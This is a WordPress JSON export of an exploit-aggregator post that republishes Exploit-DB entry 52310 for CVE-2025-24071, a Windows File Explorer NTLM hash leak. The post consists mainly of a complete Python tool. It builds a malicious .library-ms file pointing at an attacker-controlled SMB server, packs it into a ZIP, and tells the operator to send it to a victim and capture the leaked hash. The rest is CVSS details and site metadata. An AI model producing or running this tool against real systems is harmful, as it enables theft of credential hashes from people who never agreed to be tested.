{"id":6082,"date":"2025-05-29T05:33:44","date_gmt":"2025-05-29T05:33:44","guid":{"rendered":"http:\/\/localhost\/?p=6082"},"modified":"2025-05-29T05:33:44","modified_gmt":"2025-05-29T05:33:44","slug":"windows-file-explorer-windows-11-23h2-ntlm-hash-disclosure","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=6082","title":{"rendered":"Windows File Explorer Windows 11 (23H2) &#8211; NTLM Hash Disclosure"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">Windows File Explorer Windows 11 (23H2) &#8211; NTLM Hash Disclosure<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52310<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-05-29T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-05-29T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">6.5<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #ffaa00; font-weight: bold;\">MEDIUM<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:N\/A:N<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2025-24071<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\n!\/usr\/bin\/env python3 Exploit Title: Windows File Explorer Windows 11&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n#!\/usr\/bin\/env python3<br \/>\n<br \/># Exploit Title: Windows File Explorer Windows 11 (23H2) &#8211; NTLM Hash Disclosure<br \/>\n<br \/># Exploit Author: Mohammed Idrees Banyamer<br \/>\n<br \/># Twitter\/GitHub:https:\/\/github.com\/mbanyamer<br \/>\n<br \/># Date: 2025-05-27<br \/>\n<br \/># CVE: CVE-2025-24071<br \/>\n<br \/># Vendor: Microsoft<br \/>\n<br \/># Affected Versions: Windows 10\/11 (All supporting .library-ms and SMB)<br \/>\n<br \/># Tested on: Windows 11 (23H2)<br \/>\n<br \/># Type: Local \/ Remote (NTLM Leak)<br \/>\n<br \/># Platform: Windows<br \/>\n<br \/># Vulnerability Type: Information Disclosure<br \/>\n<br \/># Description:<br \/>\n<br \/>#   Windows Explorer automatically initiates an SMB authentication request when a<br \/>\n<br \/>#   .library-ms file is extracted from a ZIP archive. This causes NTLM credentials<br \/>\n<br \/>#   (in hashed format) to be leaked to a remote SMB server controlled by the attacker.<br \/>\n<br \/>#   No user interaction is required beyond extraction.<\/p>\n<p>import zipfile<br \/>\n<br \/>from pathlib import Path<br \/>\n<br \/>import argparse<br \/>\n<br \/>import re<br \/>\n<br \/>import sys<br \/>\n<br \/>from colorama import Fore, Style<\/p>\n<p>def create_library_ms(ip: str, filename: str, output_dir: Path) -> Path:<br \/>\n<br \/>    &#8220;&#8221;&#8221;Creates a malicious .library-ms file pointing to an attacker&#8217;s SMB server.&#8221;&#8221;&#8221;<br \/>\n<br \/>    payload = f&#8221;&#8217;<?xml version=\"1.0\" encoding=\"UTF-8\"?><br \/>\n<libraryDescription xmlns=\"http:\/\/schemas.microsoft.com\/windows\/2009\/library\">\n<br \/>  <searchConnectorDescriptionList><br \/>\n<br \/>    <searchConnectorDescription><br \/>\n<br \/>      <simpleLocation><br \/>\n<br \/>        <url>\\\\\\\\{ip}\\\\shared<\/url><br \/>\n<br \/>      <\/simpleLocation><br \/>\n<br \/>    <\/searchConnectorDescription><br \/>\n<br \/>  <\/searchConnectorDescriptionList><br \/>\n<\/libraryDescription>&#8221;&#8217;<\/p>\n<p>    output_file = output_dir \/ f&#8221;{filename}.library-ms&#8221;<br \/>\n<br \/>    output_file.write_text(payload, encoding=&#8221;utf-8&#8243;)<br \/>\n<br \/>    return output_file<\/p>\n<p>def build_zip(library_file: Path, output_zip: Path):<br \/>\n<br \/>    &#8220;&#8221;&#8221;Packages the .library-ms file into a ZIP archive.&#8221;&#8221;&#8221;<br \/>\n<br \/>    with zipfile.ZipFile(output_zip, &#8216;w&#8217;, zipfile.ZIP_DEFLATED) as archive:<br \/>\n<br \/>        archive.write(library_file, arcname=library_file.name)<br \/>\n<br \/>    print(f&#8221;{Fore.GREEN}[+] Created ZIP: {output_zip}{Style.RESET_ALL}&#8221;)<\/p>\n<p>def is_valid_ip(ip: str) -> bool:<br \/>\n<br \/>    return re.match(r&#8221;^\\d{1,3}(\\.\\d{1,3}){3}$&#8221;, ip) is not None<\/p>\n<p>def main():<br \/>\n<br \/>    parser = argparse.ArgumentParser(<br \/>\n<br \/>        description=&#8221;CVE-2025-24071 &#8211; NTLM Hash Disclosure via .library-ms ZIP Archive&#8221;,<br \/>\n<br \/>        epilog=&#8221;example:\\n  python3 CVE-2025-24071_tool.py -i 192.168.1.100 -n payload1 -o .\/output_folder &#8211;keep&#8221;,<br \/>\n<br \/>        formatter_class=argparse.RawTextHelpFormatter<br \/>\n<br \/>    )<\/p>\n<p>    parser.add_argument(&#8220;-i&#8221;, &#8220;&#8211;ip&#8221;, required=True, help=&#8221;Attacker SMB IP address (e.g., 192.168.1.100)&#8221;)<br \/>\n<br \/>    parser.add_argument(&#8220;-n&#8221;, &#8220;&#8211;name&#8221;, default=&#8221;malicious&#8221;, help=&#8221;Base filename (default: malicious)&#8221;)<br \/>\n<br \/>    parser.add_argument(&#8220;-o&#8221;, &#8220;&#8211;output&#8221;, default=&#8221;output&#8221;, help=&#8221;Output directory (default: .\/output)&#8221;)<br \/>\n<br \/>    parser.add_argument(&#8220;&#8211;keep&#8221;, action=&#8221;store_true&#8221;, help=&#8221;Keep .library-ms file after ZIP creation&#8221;)<\/p>\n<p>    args = parser.parse_args()<\/p>\n<p>    if not is_valid_ip(args.ip):<br \/>\n<br \/>        print(f&#8221;{Fore.RED}[!] Invalid IP address: {args.ip}{Style.RESET_ALL}&#8221;)<br \/>\n<br \/>        sys.exit(1)<\/p>\n<p>    output_dir = Path(args.output)<br \/>\n<br \/>    output_dir.mkdir(parents=True, exist_ok=True)<\/p>\n<p>    print(f&#8221;{Fore.CYAN}[*] Generating malicious .library-ms file&#8230;{Style.RESET_ALL}&#8221;)<br \/>\n<br \/>    library_file = create_library_ms(args.ip, args.name, output_dir)<br \/>\n<br \/>    zip_file = output_dir \/ f&#8221;{args.name}.zip&#8221;<br \/>\n<br \/>    build_zip(library_file, zip_file)<\/p>\n<p>    if not args.keep:<br \/>\n<br \/>        library_file.unlink()<br \/>\n<br \/>        print(f&#8221;{Fore.YELLOW}[-] Removed intermediate .library-ms file{Style.RESET_ALL}&#8221;)<\/p>\n<p>    print(f&#8221;{Fore.MAGENTA}[!] Done. Send ZIP to victim and listen for NTLM hash on your SMB server.{Style.RESET_ALL}&#8221;)<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>\n<br \/>    main()\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52310\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title Windows File Explorer Windows 11 (23H2) &#8211; NTLM Hash Disclosure Exploit ID EDB-ID:52310 Type exploitdb Published 2025-05-29T00:00:00 Modified 2025-05-29T00:00:00&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,26,12,40,21,13,7,11,5],"class_list":["post-6082","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-65","tag-exploit","tag-exploitdb","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=6082\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title Windows File Explorer Windows 11 (23H2) &#8211; NTLM Hash Disclosure Exploit ID EDB-ID:52310 Type exploitdb Published 2025-05-29T00:00:00 Modified 2025-05-29T00:00:00...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=6082\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-29T05:33:44+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6082#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6082\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Windows File Explorer Windows 11 (23H2) &#8211; NTLM Hash Disclosure\",\"datePublished\":\"2025-05-29T05:33:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6082\"},\"wordCount\":518,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-6.5\",\"exploit\",\"exploitdb\",\"MEDIUM\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=6082#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6082\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6082\",\"name\":\"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-05-29T05:33:44+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6082#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=6082\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6082#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Windows File Explorer Windows 11 (23H2) &#8211; NTLM Hash Disclosure\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=6082","og_locale":"en_US","og_type":"article","og_title":"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure - zero redgem","og_description":"Exploit Details Basic Information Exploit Title Windows File Explorer Windows 11 (23H2) &#8211; NTLM Hash Disclosure Exploit ID EDB-ID:52310 Type exploitdb Published 2025-05-29T00:00:00 Modified 2025-05-29T00:00:00...","og_url":"https:\/\/zero.redgem.net\/?p=6082","og_site_name":"zero redgem","article_published_time":"2025-05-29T05:33:44+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=6082#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=6082"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Windows File Explorer Windows 11 (23H2) &#8211; NTLM Hash Disclosure","datePublished":"2025-05-29T05:33:44+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=6082"},"wordCount":518,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-6.5","exploit","exploitdb","MEDIUM","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=6082#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=6082","url":"https:\/\/zero.redgem.net\/?p=6082","name":"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-05-29T05:33:44+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=6082#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=6082"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=6082#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Windows File Explorer Windows 11 (23H2) &#8211; NTLM Hash Disclosure"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/6082","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6082"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/6082\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6082"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6082"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6082"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}